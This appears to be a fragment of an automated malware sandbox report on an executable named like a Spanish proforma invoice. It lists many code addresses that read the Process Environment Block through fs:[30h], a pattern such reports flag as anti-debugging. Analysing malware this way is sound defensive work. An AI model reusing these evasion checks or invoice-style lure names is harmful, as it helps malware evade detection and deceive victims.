              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]2_2_367337E4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF7CF mov eax, dword ptr fs:[00000030h]2_2_367EF7CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367307A7 mov eax, dword ptr fs:[00000030h]2_2_367307A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]2_2_367FD7A7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]2_2_36761796
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]2_2_36761796
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]2_2_367AE79D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738470 mov eax, dword ptr fs:[00000030h]2_2_36738470
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738470 mov eax, dword ptr fs:[00000030h]2_2_36738470
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF478 mov eax, dword ptr fs:[00000030h]2_2_367EF478
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA464 mov eax, dword ptr fs:[00000030h]2_2_367FA464
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D450 mov eax, dword ptr fs:[00000030h]2_2_3676D450
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D450 mov eax, dword ptr fs:[00000030h]2_2_3676D450
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673D454 mov eax, dword ptr fs:[00000030h]2_2_3673D454
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E45E mov eax, dword ptr fs:[00000030h]2_2_3675E45E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0443 mov eax, dword ptr fs:[00000030h]2_2_367B0443
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B420 mov eax, dword ptr fs:[00000030h]2_2_3672B420
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B9429 mov eax, dword ptr fs:[00000030h]2_2_367B9429
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36767425 mov eax, dword ptr fs:[00000030h]2_2_36767425
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36767425 mov ecx, dword ptr fs:[00000030h]2_2_36767425
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF409 mov eax, dword ptr fs:[00000030h]2_2_367EF409
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C6400 mov eax, dword ptr fs:[00000030h]2_2_367C6400
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C6400 mov eax, dword ptr fs:[00000030h]2_2_367C6400
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672640D mov eax, dword ptr fs:[00000030h]2_2_3672640D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF4FD mov eax, dword ptr fs:[00000030h]2_2_367EF4FD
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367364F0 mov eax, dword ptr fs:[00000030h]2_2_367364F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A4F0 mov eax, dword ptr fs:[00000030h]2_2_3676A4F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A4F0 mov eax, dword ptr fs:[00000030h]2_2_3676A4F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367594FA mov eax, dword ptr fs:[00000030h]2_2_367594FA
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367654E0 mov eax, dword ptr fs:[00000030h]2_2_367654E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E4EF mov eax, dword ptr fs:[00000030h]2_2_3676E4EF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E4EF mov eax, dword ptr fs:[00000030h]2_2_3676E4EF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367544D1 mov eax, dword ptr fs:[00000030h]2_2_367544D1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367544D1 mov eax, dword ptr fs:[00000030h]2_2_367544D1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E4BC mov eax, dword ptr fs:[00000030h]2_2_3676E4BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367324A2 mov eax, dword ptr fs:[00000030h]2_2_367324A2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367324A2 mov ecx, dword ptr fs:[00000030h]2_2_367324A2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BD4A0 mov ecx, dword ptr fs:[00000030h]2_2_367BD4A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BD4A0 mov eax, dword ptr fs:[00000030h]2_2_367BD4A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BD4A0 mov eax, dword ptr fs:[00000030h]2_2_367BD4A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367644A8 mov eax, dword ptr fs:[00000030h]2_2_367644A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676B490 mov eax, dword ptr fs:[00000030h]2_2_3676B490
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676B490 mov eax, dword ptr fs:[00000030h]2_2_3676B490
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC490 mov eax, dword ptr fs:[00000030h]2_2_367BC490
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730485 mov ecx, dword ptr fs:[00000030h]2_2_36730485
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676648A mov eax, dword ptr fs:[00000030h]2_2_3676648A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676648A mov eax, dword ptr fs:[00000030h]2_2_3676648A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676648A mov eax, dword ptr fs:[00000030h]2_2_3676648A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674C560 mov eax, dword ptr fs:[00000030h]2_2_3674C560
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA553 mov eax, dword ptr fs:[00000030h]2_2_367FA553
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674E547 mov eax, dword ptr fs:[00000030h]2_2_3674E547
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36766540 mov eax, dword ptr fs:[00000030h]2_2_36766540
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36768540 mov eax, dword ptr fs:[00000030h]2_2_36768540
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673254C mov eax, dword ptr fs:[00000030h]2_2_3673254C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36733536 mov eax, dword ptr fs:[00000030h]2_2_36733536
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36733536 mov eax, dword ptr fs:[00000030h]2_2_36733536
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672753F mov eax, dword ptr fs:[00000030h]2_2_3672753F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672753F mov eax, dword ptr fs:[00000030h]2_2_3672753F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672753F mov eax, dword ptr fs:[00000030h]2_2_3672753F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772539 mov eax, dword ptr fs:[00000030h]2_2_36772539
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36761527 mov eax, dword ptr fs:[00000030h]2_2_36761527
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676F523 mov eax, dword ptr fs:[00000030h]2_2_3676F523
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674252B mov eax, dword ptr fs:[00000030h]2_2_3674252B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36751514 mov eax, dword ptr fs:[00000030h]2_2_36751514
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC51D mov eax, dword ptr fs:[00000030h]2_2_367BC51D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov ecx, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov ecx, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF51B mov eax, dword ptr fs:[00000030h]2_2_367DF51B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B502 mov eax, dword ptr fs:[00000030h]2_2_3672B502
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675E507 mov eax, dword ptr fs:[00000030h]2_2_3675E507
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36732500 mov eax, dword ptr fs:[00000030h]2_2_36732500
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C50D mov eax, dword ptr fs:[00000030h]2_2_3676C50D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C50D mov eax, dword ptr fs:[00000030h]2_2_3676C50D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC5FC mov eax, dword ptr fs:[00000030h]2_2_367BC5FC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A5E7 mov ebx, dword ptr fs:[00000030h]2_2_3676A5E7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A5E7 mov eax, dword ptr fs:[00000030h]2_2_3676A5E7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B5E0 mov eax, dword ptr fs:[00000030h]2_2_3673B5E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367615EF mov eax, dword ptr fs:[00000030h]2_2_367615EF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B55E0 mov eax, dword ptr fs:[00000030h]2_2_367B55E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367665D0 mov eax, dword ptr fs:[00000030h]2_2_367665D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676C5C6 mov eax, dword ptr fs:[00000030h]2_2_3676C5C6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F5C7 mov eax, dword ptr fs:[00000030h]2_2_3672F5C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B05C6 mov eax, dword ptr fs:[00000030h]2_2_367B05C6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367345B0 mov eax, dword ptr fs:[00000030h]2_2_367345B0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367345B0 mov eax, dword ptr fs:[00000030h]2_2_367345B0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B85AA mov eax, dword ptr fs:[00000030h]2_2_367B85AA
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B55F mov eax, dword ptr fs:[00000030h]2_2_3680B55F
